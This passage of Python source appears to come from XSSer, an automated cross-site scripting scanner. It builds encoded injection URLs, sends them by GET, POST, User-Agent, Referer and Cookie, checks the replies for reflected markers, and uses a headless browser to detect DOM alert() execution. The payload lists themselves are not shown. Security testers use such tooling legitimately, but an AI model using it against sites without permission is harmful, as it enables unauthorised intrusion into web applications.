 806. else:
 807. target_params[key] = v
 808. if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling:
 809. self.not_keyword_exit()
 810. payload_url = query_string.strip() + hashed_vector_url
 811. target_url_params = urllib.parse.urlencode(target_params)
 812. dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
 813. else: # using POST provided by parameter (-p)
 814. target_params = parse_qs(query_string, keep_blank_values=True)
 815. r = 0
 816. for key, value in target_params.items(): # parse params searching for keywords
 817. for v in value:
 818. if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload
 819. if v == 'XSS':
 820. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
 821. elif v == 'X1S':
 822. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
 823. hashed_payload = payload_string.replace('XSS', url_orig_hash)
 824. if "[B64]" in hashed_payload: # [DCP Injection]
 825. dcp_payload = hashed_payload.split("[B64]")[1]
 826. dcp_preload = hashed_payload.split("[B64]")[0]
 827. dcp_payload = b64encode(dcp_payload)
 828. hashed_payload = dcp_preload + dcp_payload
 829. self.hashed_injections[url_orig_hash] = key
 830. if user_attack_payload:
 831. pass
 832. else:
 833. hashed_vector_url = self.encoding_permutations(hashed_payload)
 834. target_params[key] = hashed_vector_url
 835. r = r + 1
 836. else:
 837. if self.options.xsa or self.options.xsr or self.options.coo:
 838. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
 839. self.hashed_injections[url_orig_hash] = key
 840. target_params[key] = v
 841. r = r + 1
 842. else:
 843. target_params[key] = v
 844. if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling:
 845. self.not_keyword_exit()
 846. target_url_params = urllib.parse.urlencode(target_params)
 847. dest_url = target_url_params
 848. self._ongoing_attacks['url'] = url_orig_hash
 849. if payload['browser'] == "[Document Object Model Injection]": # url decoding/unquote DOM payloads to execute url #fragments
 850. dest_url = urllib.parse.unquote(dest_url)
 851. return dest_url, agent, referer, cookie
 852. def attack_url_payload(self, url, payload, query_string):
 853. if not self.pool:
 854. pool = self.mothership.pool
 855. else:
 856. pool = self.pool
 857. c = Curl()
 858. if self.options.headers: # add extra headers
 859. headers = self.options.headers
 860. else:
 861. headers = None
 862. if self.options.getdata or not self.options.postdata:
 863. dest_url, agent, referer, cookie = self.get_url_payload(url, payload, query_string, None)
 864. def _cb(request, result):
 865. self.finish_attack_url_payload(c, request, result, payload,
 866. query_string, url, dest_url)
 867. _error_cb = self.error_attack_url_payload
 868. def _error_cb(request, error):
 869. self.error_attack_url_payload(c, url, request, error)
 870. c.agent = agent
 871. c.referer = referer
 872. c.cookie = cookie
 873. if " " in dest_url: # parse blank spaces
 874. dest_url = dest_url.replace(" ", "+")
 875. pool.addRequest(c.get, [[dest_url, headers]], _cb, _error_cb)
 876. self._ongoing_requests += 1
 877. if self.options.postdata:
 878. dest_url, agent, referer, cookie = self.get_url_payload("", payload, query_string, None)
 879. def _cb(request, result):
 880. self.finish_attack_url_payload(c, request, result, payload,
 881. query_string, url, dest_url)
 882. _error_cb = self.error_attack_url_payload
 883. def _error_cb(request, error):
 884. self.error_attack_url_payload(c, url, request, error)
 885. dest_url = dest_url.strip().replace("/", "", 1)
 886. c.agent = agent
 887. c.referer = referer
 888. c.cookie = cookie
 889. pool.addRequest(c.post, [[url, dest_url, headers]], _cb, _error_cb)
 890. self._ongoing_requests += 1
 891. def error_attack_url_payload(self, c, url, request, error):
 892. self._ongoing_requests -= 1
 893. for reporter in self._reporters:
 894. reporter.mosquito_crashed(url, str(error[0]))
 895. dest_url = request.args[0]
 896. self.report("[Error] Failed attempt (URL Malformed!?): " + url + "\n")
 897. self.urlmalformed = True
 898. if self.urlmalformed == True and self.urlspoll[0] == url:
 899. self.land()
 900. if DEBUG == True:
 901. self.report(str(error[0]))
 902. traceback.print_tb(error[2])
 903. c.close()
 904. del c
 905. return
 906. def finish_attack_url_payload(self, c, request, result, payload,
 907. query_string, url, dest_url):
 908. self.round_complete = self.round_complete + 1
 909. self.report("="*75)
 910. self.report("[*] Test: [ "+str(self.round_complete)+"/"+str(self.rounds)+" ] <-> "+str(self.time))
 911. self.report("="*75)
 912. self.report("\n[+] Target: \n\n [ "+ str(url) + " ]\n")
 913. self._ongoing_requests -= 1
 914. # adding constant head check number flag
 915. if self.options.isalive:
 916. self.flag_isalive_num = int(self.options.isalive)
 917. if not self.options.isalive:
 918. pass
 919. elif self.options.isalive and not self.options.nohead:
 920. self.errors_isalive = self.errors_isalive + 1
 921. if self.errors_isalive > self.options.isalive:
 922. pass
 923. else:
 924. self.report("---------------------")
 925. self.report("Alive Checker for: " + url + " - [", self.errors_isalive, "/", self.options.isalive, "]\n")
 926. if self.next_isalive == True:
 927. hc = Curl()
 928. self.next_isalive = False
 929. try:
 930. urls = hc.do_head_check([url])
 931. except:
 932. print("[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n")
 933. self.errors_isalive = 0
 934. return
 935. if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
 936. print("HEAD alive check: OK" + "(" + hc.info()["http-code"] + ")\n")
 937. print("- Your target still Alive: " + "(" + url + ")")
 938. print("- If you are receiving continuous 404 errors requests on your injections but your target is alive is because:\n")
 939. print(" - your injections are failing: normal :-)")
 940. print(" - maybe exists some IPS/NIDS/... systems blocking your requests!\n")
 941. else:
 942. if str(hc.info()["http-code"]) == "0":
 943. print("\n[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n")
 944. else:
 945. print("HEAD alive check: FAILED" + "(" + hc.info()["http-code"] + ")\n")
 946. print("- Your target " + "(" + url + ")" + " looks that is NOT alive")
 947. print("- If you are receiving continuous 404 errors requests on payloads\n and this HEAD pre-check request is giving you another 404\n maybe is because; target is down, url malformed, something is blocking you...\n- If you haven't more than one target then try to; STOP THIS TEST!!\n")
 948. self.errors_isalive = 0
 949. else:
 950. if str(self.errors_isalive) >= str(self.options.isalive):
 951. self.report("---------------------")
 952. self.report("\nAlive System: XSSer is checking if your target still alive. [Waiting for reply...]\n")
 953. self.next_isalive = True
 954. self.options.isalive = self.flag_isalive_num
 955. else:
 956. if self.options.isalive and self.options.nohead:
 957. self.report("---------------------")
 958. self.report("Alive System DISABLED!: XSSer is using a pre-check HEAD request per target by default to perform better accurance on tests\nIt will check if target is alive before inject all the payloads. try (--no-head) with (--alive <num>) to control this checker limit manually")
 959. self.report("---------------------")
 960. # check results an alternative url, choosing method and parameters, or not
 961. if self.options.altm == None or self.options.altm not in ["GET", "POST", "post"]:
 962. self.options.altm = "GET"
 963. if self.options.altm == "post":
 964. self.options.altm = "POST"
 965. if self.options.alt == None:
 966. pass
 967. else:
 968. self.report("="*45)
 969. self.report("\n[+] Checking Response Options:", "\n")
 970. self.report("[+] Url:", self.options.alt)
 971. self.report("[-] Method:", self.options.altm)
 972. if self.options.ald:
 973. self.report("[-] Parameter(s):", self.options.ald, "\n")
 974. else:
 975. self.report("[-] Parameter(s):", query_string, "\n")
 976. if c.info()["http-code"] in ["200", "302", "301"]:
 977. if self.options.statistics:
 978. self.success_connection = self.success_connection + 1
 979. self._report_attack_success(c, dest_url, payload,
 980. query_string, url)
 981. else:
 982. self._report_attack_failure(c, dest_url, payload,
 983. query_string, url)
 984. # checking response results
 985. if self.options.alt == None:
 986. pass
 987. else:
 988. self.report("="*45)
 989. self.report("\n[+] Checking Response Results:", "\n")
 990. url_orig_hash = self._ongoing_attacks['url']
 991. self.report("Searching using", self.options.altm, "for:", url_orig_hash, "on alternative url\n")
 992. if 'PAYLOAD' in payload['payload']:
 993. user_attack_payload = payload['payload'].replace('PAYLOAD', url_orig_hash)
 994. if 'XSS' in payload['payload']:
 995. user_attack_payload = payload['payload'].replace('XSS', url_orig_hash)
 996. if 'X1S' in payload['payload']:
 997. user_attack_payload = payload['payload'].replace('X1S', url_orig_hash)
 998. if self.options.ald:
 999. query_string = self.options.ald
 1000. if "VECTOR" in self.options.alt:
 1001. dest_url = self.options.alt
 1002. else:
 1003. if not dest_url.endswith("/"):
 1004. dest_url = dest_url + "/"
 1005. if self.options.altm == 'POST':
 1006. dest_url = "" + query_string + user_attack_payload
 1007. dest_url = dest_url.strip().replace("/", "", 1)
 1008. data = c.post(url, dest_url, None)
 1009. else:
 1010. dest_url = self.options.alt + query_string + user_attack_payload
 1011. c.get(dest_url)
 1012. # perform check response injection
 1013. if c.info()["http-code"] in ["200", "302", "301"]:
 1014. if self.options.statistics:
 1015. self.success_connection = self.success_connection + 1
 1016. self._report_attack_success(c, dest_url, payload,
 1017. query_string, url)
 1018. else:
 1019. self._report_attack_failure(c, dest_url, payload,
 1020. query_string, url)
 1021. c.close()
 1022. del c
 1023. def encoding_permutations(self, enpayload_url):
 1024. """
 1025. perform encoding permutations on the url and query_string.
 1026. """
 1027. options = self.options
 1028. if options.Cem:
 1029. enc_perm = options.Cem.split(",")
 1030. for _enc in enc_perm:
 1031. enpayload_url = self.encmap[_enc](enpayload_url)
 1032. else:
 1033. for enctype in list(self.encmap.keys()):
 1034. if getattr(options, enctype):
 1035. enpayload_url = self.encmap[enctype](enpayload_url)
 1036. return enpayload_url
 1037. def _report_attack_success(self, curl_handle, dest_url, payload,\
 1038. query_string, orig_url):
 1039. """
 1040. report connection success when attacking
 1041. """
 1042. if not orig_url in self.successful_urls:
 1043. self.successful_urls.append(orig_url)
 1044. options = self.options
 1045. current_hashes = [] # to check for ongoing hashes
 1046. if payload['browser'] == "[Heuristic test]":
 1047. for key, value in self.hashed_injections.items():
 1048. if str(key) in dest_url:
 1049. if key not in current_hashes:
 1050. self.final_hashes[key] = value
 1051. current_hashes.append(key)
 1052. elif self.options.hash:
 1053. for key, value in self.hashed_injections.items():
 1054. self.final_hashes[key] = value
 1055. current_hashes.append(key)
 1056. else:
 1057. self.report("-"*45)
 1058. self.report("\n[!] Hashing: \n")
 1059. for key, value in self.hashed_injections.items():
 1060. if str(key) in str(dest_url):
 1061. if key not in current_hashes:
 1062. self.report(" [ " +key+" ] : [" , value + " ]")
 1063. self.final_hashes[key] = value
 1064. current_hashes.append(key)
 1065. else:
 1066. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
 1067. b64_string = payload["payload"].split("[B64]")
 1068. b64_string = b64_string[1]
 1069. b64_string = b64_string.replace('PAYLOAD', key)
 1070. b64_string = b64encode(b64_string)
 1071. b64_string = urllib.parse.urlencode({'':b64_string})
 1072. if b64_string.startswith("="):
 1073. b64_string = b64_string.replace("=", "")
 1074. if str(b64_string) in str(dest_url):
 1075. if key not in current_hashes:
 1076. self.report(" [ " +key+" ] : [" , value + " ]")
 1077. self.final_hashes[key] = value
 1078. current_hashes.append(key)
 1079. else: # when using encoders (Str, Hex, Dec...)
 1080. if self.options.Str or self.options.Une or self.options.Mix or self.options.Dec or self.options.Hex or self.options.Hes or self.options.Cem:
 1081. if "PAYLOAD" in payload["payload"]:
 1082. payload_string = payload["payload"].replace("PAYLOAD", key)
 1083. elif "VECTOR" in payload["payload"]:
 1084. payload_string = payload["payload"].replace("VECTOR", key)
 1085. elif "XSS" in payload["payload"]:
 1086. payload_string = payload["payload"].replace("XSS", key)
 1087. elif "X1S" in payload["payload"]:
 1088. payload_string = payload["payload"].replace("X1S", key)
 1089. if self.options.Cem:
 1090. enc_perm = options.Cem.split(",")
 1091. for e in enc_perm:
 1092. hashed_payload = self.encoding_permutations(payload_string)
 1093. if e == "Str":
 1094. hashed_payload = hashed_payload.replace(",", "%2C")
 1095. dest_url = dest_url.replace(",", "%2C")
 1096. if e == "Mix":
 1097. hashed_payload=urllib.parse.quote(hashed_payload)
 1098. dest_url = urllib.parse.quote(dest_url)
 1099. if e == "Dec":
 1100. hashed_payload = hashed_payload.replace("&#", "%26%23")
 1101. dest_url = dest_url.replace("&#", "%26%23")
 1102. if e == "Hex":
 1103. hashed_payload = hashed_payload.replace("%", "%25")
 1104. dest_url = dest_url.replace("%", "%25")
 1105. if e == "Hes":
 1106. hashed_payload = hashed_payload.replace("&#", "%26%23")
 1107. hashed_payload = hashed_payload.replace(";", "%3B")
 1108. dest_url = dest_url.replace("&#", "%26%23")
 1109. dest_url = dest_url.replace(";", "%3B")
 1110. else:
 1111. hashed_payload = self.encoding_permutations(payload_string)
 1112. if self.options.Str:
 1113. hashed_payload = hashed_payload.replace(",", "%2C")
 1114. dest_url = dest_url.replace(",", "%2C")
 1115. if self.options.Mix:
 1116. hashed_payload=urllib.parse.quote(hashed_payload)
 1117. dest_url = urllib.parse.quote(dest_url)
 1118. if self.options.Dec:
 1119. hashed_payload = hashed_payload.replace("&#", "%26%23")
 1120. dest_url = dest_url.replace("&#", "%26%23")
 1121. if self.options.Hex:
 1122. hashed_payload = hashed_payload.replace("%", "%25")
 1123. dest_url = dest_url.replace("%", "%25")
 1124. if self.options.Hes:
 1125. hashed_payload = hashed_payload.replace("&#", "%26%23")
 1126. hashed_payload = hashed_payload.replace(";", "%3B")
 1127. dest_url = dest_url.replace("&#", "%26%23")
 1128. dest_url = dest_url.replace(";", "%3B")
 1129. if str(hashed_payload) in str(dest_url):
 1130. if key not in current_hashes:
 1131. self.report(" [ " +key+" ] : [" , value + " ]")
 1132. self.final_hashes[key] = value
 1133. current_hashes.append(key)
 1134. if self.extra_hashed_injections:
 1135. for k, v in self.extra_hashed_injections.items():
 1136. payload_url = str(v[1])
 1137. if payload_url == payload["payload"]:
 1138. if k not in current_hashes:
 1139. self.report(" [ " +k+" ] : [" , v[0] + " ]")
 1140. self.final_hashes[k] = v[0]
 1141. current_hashes.append(k)
 1142. self.report("\n"+"-"*45+"\n")
 1143. if payload['browser'] == "[Heuristic test]":
 1144. self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n")
 1145. else:
 1146. if self.extra_hashed_injections:
 1147. extra_attacks=[]
 1148. if options.xsa:
 1149. extra_attacks.append("XSA")
 1150. if options.xsr:
 1151. extra_attacks.append("XSR")
 1152. if options.coo:
 1153. extra_attacks.append("COO")
 1154. if extra_attacks:
 1155. extra_attacks = "+ "+ str(extra_attacks)
 1156. if options.postdata:
 1157. self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n")
 1158. else:
 1159. self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n")
 1160. else:
 1161. if options.postdata:
 1162. self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n")
 1163. else:
 1164. self.report("[*] Trying: \n\n" + dest_url.strip()+"\n")
 1165. if not self.options.hash and not self.options.script:
 1166. if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo:
 1167. pass
 1168. else:
 1169. self.report("-"*45)
 1170. if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
 1171. pass
 1172. else:
 1173. if not "XSS" in dest_url or not "X1S" in dest_url:
 1174. if self.options.xsa or self.options.xsr or self.options.coo:
 1175. pass
 1176. else:
 1177. self.report("-"*45)
 1178. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
 1179. if not self.options.verbose:
 1180. self.report("-"*45 + "\n")
 1181. else:
 1182. self.report("-"*45)
 1183. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
 1184. if not self.options.verbose:
 1185. self.report("-"*45 + "\n")
 1186. # statistics injections counters
 1187. if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
 1188. self.check_positives = self.check_positives + 1
 1189. elif payload['browser']=="[Data Control Protocol Injection]":
 1190. self.dcp_injection = self.dcp_injection + 1
 1191. elif payload['browser']=="[Document Object Model Injection]":
 1192. self.dom_injection = self.dom_injection + 1
 1193. elif payload['browser']=="[Induced Injection]":
 1194. self.httpsr_injection = self.httpsr_injection + 1
 1195. elif payload['browser']=="[manual_injection]":
 1196. self.manual_injection = self.manual_injection + 1
 1197. else:
 1198. self.auto_injection = self.auto_injection +1
 1199. if not self.hashed_injections:
 1200. for k, v in self.extra_hashed_injections.items():
 1201. if k in current_hashes:
 1202. if v[0] == "XSA":
 1203. agent = v[1]
 1204. agent = agent.replace("PAYLOAD", k)
 1205. Curl.agent = agent
 1206. if v[0] == "XSR":
 1207. referer = v[1]
 1208. referer = referer.replace("PAYLOAD", k)
 1209. Curl.referer = referer
 1210. if v[0] == "COO":
 1211. cookie = v[1]
 1212. cookie = cookie.replace("PAYLOAD", k)
 1213. Curl.cookie = cookie
 1214. else:
 1215. for key, value in self.hashed_injections.items():
 1216. for k, v in self.extra_hashed_injections.items():
 1217. payload_url = v[1]
 1218. payload_url = payload_url.replace("PAYLOAD",key)
 1219. payload_url = payload_url.replace(" ", "+") # black magic!
 1220. final_dest_url = str(urllib.parse.unquote(dest_url.strip()))
 1221. if payload_url in final_dest_url:
 1222. if v[0] == "XSA":
 1223. agent = v[1]
 1224. agent = agent.replace("PAYLOAD", k)
 1225. Curl.agent = agent
 1226. if v[0] == "XSR":
 1227. referer = v[1]
 1228. referer = referer.replace("PAYLOAD", k)
 1229. Curl.referer = referer
 1230. if v[0] == "COO":
 1231. cookie = v[1]
 1232. cookie = cookie.replace("PAYLOAD", k)
 1233. Curl.cookie = cookie
 1234. else:
 1235. if k in current_hashes:
 1236. if v[0] == "XSA":
 1237. agent = v[1]
 1238. agent = agent.replace("PAYLOAD", k)
 1239. Curl.agent = agent
 1240. if v[0] == "XSR":
 1241. referer = v[1]
 1242. referer = referer.replace("PAYLOAD", k)
 1243. Curl.referer = referer
 1244. if v[0] == "COO":
 1245. cookie = v[1]
 1246. cookie = cookie.replace("PAYLOAD", k)
 1247. Curl.cookie = cookie
 1248. if options.verbose:
 1249. self.report("-"*45)
 1250. self.report("\n[+] HTTP Headers Verbose:\n")
 1251. self.report(" [Client Request]")
 1252. Curl.print_options()
 1253. self.report(" [Server Reply]\n")
 1254. self.report(curl_handle.info())
 1255. self.report("="*45)
 1256. self.report("[*] Injection(s) Results:")
 1257. self.report("="*45 + "\n")
 1258. if payload['browser']=="[Heuristic test]":
 1259. for key, value in self.final_hashes.items():
 1260. if str(key) in dest_url:
 1261. heuristic_string = key
 1262. heuristic_param = str(payload['payload']).strip('XSS')
 1263. # checking heuristic responses
 1264. if heuristic_string in curl_handle.body():
 1265. # ascii
 1266. if heuristic_param == "\\":
 1267. self.heuris_backslash_found = self.heuris_backslash_found + 1
 1268. # / same as ASCII and Unicode
 1269. elif heuristic_param == "/":
 1270. self.heuris_slash_found = self.heuris_slash_found + 1
 1271. self.heuris_une_slash_found = self.heuris_une_slash_found + 1
 1272. elif heuristic_param == ">":
 1273. self.heuris_mayor_found = self.heuris_mayor_found + 1
 1274. elif heuristic_param == "<":
 1275. self.heuris_minor_found = self.heuris_minor_found + 1
 1276. elif heuristic_param == ";":
 1277. self.heuris_semicolon_found = self.heuris_semicolon_found + 1
 1278. elif heuristic_param == "'":
 1279. self.heuris_colon_found = self.heuris_colon_found + 1
 1280. elif heuristic_param == '"':
 1281. self.heuris_doublecolon_found = self.heuris_doublecolon_found + 1
 1282. elif heuristic_param == "=":
 1283. self.heuris_equal_found = self.heuris_equal_found + 1
 1284. # une
 1285. elif heuristic_param == "%5C":
 1286. self.heuris_une_backslash_found = self.heuris_une_backslash_found + 1
 1287. elif heuristic_param == "%3E":
 1288. self.heuris_une_mayor_found = self.heuris_une_mayor_found + 1
 1289. elif heuristic_param == "%3C":
 1290. self.heuris_une_minor_found = self.heuris_une_minor_found + 1
 1291. elif heuristic_param == "%3B":
 1292. self.heuris_une_semicolon_found = self.heuris_une_semicolon_found + 1
 1293. elif heuristic_param == "%27":
 1294. self.heuris_une_colon_found = self.heuris_une_colon_found + 1
 1295. elif heuristic_param == "%22":
 1296. self.heuris_une_doublecolon_found = self.heuris_une_doublecolon_found + 1
 1297. elif heuristic_param == "%3D":
 1298. self.heuris_une_equal_found = self.heuris_une_equal_found + 1
 1299. # dec
 1300. elif heuristic_param == "&#92":
 1301. self.heuris_dec_backslash_found = self.heuris_dec_backslash_found + 1
 1302. elif heuristic_param == "&#47":
 1303. self.heuris_dec_slash_found = self.heuris_dec_slash_found + 1
 1304. elif heuristic_param == "&#62":
 1305. self.heuris_dec_mayor_found = self.heuris_dec_mayor_found + 1
 1306. elif heuristic_param == "&#60":
 1307. self.heuris_dec_minor_found = self.heuris_dec_minor_found + 1
 1308. elif heuristic_param == "&#59":
 1309. self.heuris_dec_semicolon_found = self.heuris_dec_semicolon_found + 1
 1310. elif heuristic_param == "&#39":
 1311. self.heuris_dec_colon_found = self.heuris_dec_colon_found + 1
 1312. elif heuristic_param == "&#34":
 1313. self.heuris_dec_doublecolon_found = self.heuris_dec_doublecolon_found + 1
 1314. elif heuristic_param == "&#61":
 1315. self.heuris_dec_equal_found = self.heuris_dec_equal_found + 1
 1316. self.add_success(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # success!
 1317. else:
 1318. if heuristic_param == "\\":
 1319. self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1
 1320. elif heuristic_param == "/":
 1321. self.heuris_slash_notfound = self.heuris_slash_notfound + 1
 1322. elif heuristic_param == ">":
 1323. self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1
 1324. elif heuristic_param == "<":
 1325. self.heuris_minor_notfound = self.heuris_minor_notfound + 1
 1326. elif heuristic_param == ";":
 1327. self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1
 1328. elif heuristic_param == "'":
 1329. self.heuris_colon_notfound = self.heuris_colon_notfound + 1
 1330. elif heuristic_param == '"':
 1331. self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1
 1332. elif heuristic_param == "=":
 1333. self.heuris_equal_notfound = self.heuris_equal_notfound + 1
 1334. self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail
 1335. elif self.options.hash:
 1336. for key, value in self.final_hashes.items():
 1337. if str(key) in dest_url:
 1338. if key in curl_handle.body():
 1339. self.add_success(dest_url, key, value, query_string, orig_url, 'hashing check') # success!
 1340. else:
 1341. self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail
 1342. else:
 1343. for key, value in self.final_hashes.items():
 1344. if key in current_hashes:
 1345. if "XSA" in value:
 1346. method = "XSA"
 1347. hashing = key
 1348. elif "XSR" in value:
 1349. method = "XSR"
 1350. hashing = key
 1351. elif "COO" in value:
 1352. method = "COO"
 1353. hashing = key
 1354. else:
 1355. method = value
 1356. hashing = key
 1357. if not hashing:
 1358. pass
 1359. else:
 1360. if hashing not in dest_url:
 1361. if key in current_hashes:
 1362. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
 1363. b64_string = payload["payload"].split("[B64]")
 1364. b64_string = b64_string[1]
 1365. b64_string = b64_string.replace('PAYLOAD', key)
 1366. b64_string = b64encode(b64_string)
 1367. b64_string = urllib.parse.urlencode({'':b64_string})
 1368. if b64_string.startswith("="):
 1369. b64_string = b64_string.replace("=", "")
 1370. if str(b64_string) in str(dest_url):
 1371. self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)
 1372. else:
 1373. self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)
 1374. else:
 1375. self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)
 1376. self.report("")
 1377. def check_hash_on_target(self, hashing, dest_url, orig_url, payload, query_string, method, curl_handle):
 1378. options = self.options
 1379. c_info = str(curl_handle.info())
 1380. c_body = str(curl_handle.body())
 1381. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
 1382. b64_string = payload["payload"].split("[B64]")
 1383. b64_string = b64_string[1]
 1384. b64_string = b64_string.replace('PAYLOAD', hashing)
 1385. b64_string = b64encode(b64_string)
 1386. if b64_string.startswith("="):
 1387. b64_string = b64_string.replace("=", "")
 1388. hashing = b64_string
 1389. if payload['browser'] == "[Document Object Model Injection]":
 1390. self.check_hash_using_dom(dest_url, payload, hashing, query_string, orig_url, method) # check hash using internal headless browser engine
 1391. else:
 1392. if str(hashing) in c_body and "http-code: 200" in c_info: # [XSS CHECKPOINT: anti-false positives]
 1393. self.check_false_positives(hashing, c_body, dest_url, payload, query_string, orig_url, method)
 1394. else:
 1395. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
 1396. def check_hash_using_dom(self, dest_url, payload, hashing, query_string, orig_url, method):
 1397. if self.cookie_set_flag == False:
 1398. self.generate_headless_cookies(orig_url)
 1399. self.cookie_set_flag = True # cookie has been set!
 1400. try:
 1401. self.driver.get(dest_url) # GET
 1402. src = self.driver.page_source
 1403. except self.dom_browser_alert as alert_text: # handled with UnexpectedAlertPresentException
 1404. if (hashing in str(alert_text)): # [XSS DOM CHECKPOINT: alert() dialog open!]
 1405. self.add_success(dest_url, payload, hashing, query_string, orig_url, method) # success!
 1406. self.token_arrived_hashes.append(hashing) # add token/hashing for counting
 1407. else:
 1408. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
 1409. else:
 1410. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
 1411. def check_false_positives(self, hashing, c_body, dest_url, payload, query_string, orig_url, method): # some anti false positives checkers
 1412. if str(self.options.discode) in c_body: # provided by user
 1413. self.report("[Info] Reply contains code [ --discode ] provided to be discarded -> [DISCARDING!]\n")
 1414. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
 1415. else:
 1416. if str('&gt;' + hashing) in c_body or str('href=' + dest_url + hashing) in c_body or str('content=' + dest_url + hashing) in c_body:
 1417. self.report("[Info] Reply looks like a 'false positive' -> [DISCARDING!]\n")
 1418. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
 1419. elif str(hashing+",") in c_body or str(hashing+'","') in c_body:
 1420. self.report("[Info] Reply looks like a 'false positive' -> [DISCARDING!]\n")
 1421. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
 1422. else:
 1423. if self.options.discode:
 1424. self.report("[Info] Reply does NOT contain code [ --discode ] provided to be discarded -> [ADDING!] ;-)\n")
 1425. self.add_success(dest_url, payload, hashing, query_string, orig_url, method) # success!
 1426. def add_failure(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
 1427. """
 1428. Add an attack that failed to inject
 1429. """
 1430. if method == "heuristic":
 1431. self.report(" [NOT FOUND] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
 1432. self.hash_notfound.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url))
 1433. elif method == "hashing check":
 1434. self.report(" [NOT FOUND] -> [ " + str(hashing) + " ] : [ hashing_check ]")
 1435. self.hash_notfound.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url))
 1436. else:
 1437. self.report(" [NOT FOUND] -> [ " + hashing + " ] : [ " + method + " ]")
 1438. self.hash_notfound.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
 1439. def add_success(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
 1440. """
 1441. Add an attack that have managed to inject code
 1442. """
 1443. if method == "heuristic":
 1444. self.report(" [FOUND !!!] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
 1445. self.hash_found.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url))
 1446. elif method == "hashing check":
 1447. self.report(" [FOUND !!!] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
 1448. self.hash_found.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url))
 1449. else:
 1450. payload_sub = payload['payload']
 1451. self.report(" [FOUND !!!] -> [ " + hashing + " ] : [ " + method + " ]")
 1452. self.hash_found.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
 1453. for reporter in self._reporters:
 1454. reporter.add_success(dest_url)
 1455. if self.options.reversecheck:
 1456. if self.options.dcp or self.options.inducedcode or self.options.dom:
 1457. pass
 1458. else:
 1459. self.do_token_check(orig_url, hashing, payload, query_string, dest_url)
 1460. def create_headless_embed_browser(self): # selenium + firefox + gecko(bin)
 1461. agents = [] # user-agents
 1462. self.cookie_set_flag = False # used for cookie
 1463. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
 1464. for line in f:
 1465. agents.append(line)
 1466. try:
 1467. agent = random.choice(agents).strip() # set random user-agent
 1468. except:
 1469. agent = "Privoxy/1.0" # set static user-agent
 1470. try:
 1471. from selenium import webdriver
 1472. from selenium.webdriver.firefox.options import Options as FirefoxOptions
 1473. from selenium.common.exceptions import UnexpectedAlertPresentException as UnexpectedAlertPresentException # used for search alert dialogs at DOM
 1474. except:
 1475. print("\n[Error] Importing: selenium lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python3-selenium'\n")
 1476. sys.exit(2)
 1477. try:
 1478. self.dom_browser_alert = UnexpectedAlertPresentException
 1479. profile = webdriver.FirefoxProfile()
 1480. profile.set_preference("general.useragent.override", str(agent)) # set Firefox (profile) - random user-agent
 1481. profile.set_preference('browser.safebrowsing.enabled', True)
 1482. profile.set_preference('toolkit.telemetry.enabled', False)
 1483. profile.set_preference('webdriver_accept_untrusted_certs', True)
 1484. profile.set_preference('security.insecure_field_warning.contextual.enabled', False)
 1485. profile.set_preference('security.insecure_password.ui.enabled', False)
 1486. profile.set_preference('extensions.logging.enabled', False)
 1487. options = FirefoxOptions()
 1488. options.add_argument("-headless") # set Firefox (options) - headless mode
 1489. options.add_argument("-no-remote")
 1490. options.add_argument("-no-first-run")
 1491. options.add_argument("-app")
 1492. options.add_argument("-safe-mode")
 1493. current_dir = os.getcwd()
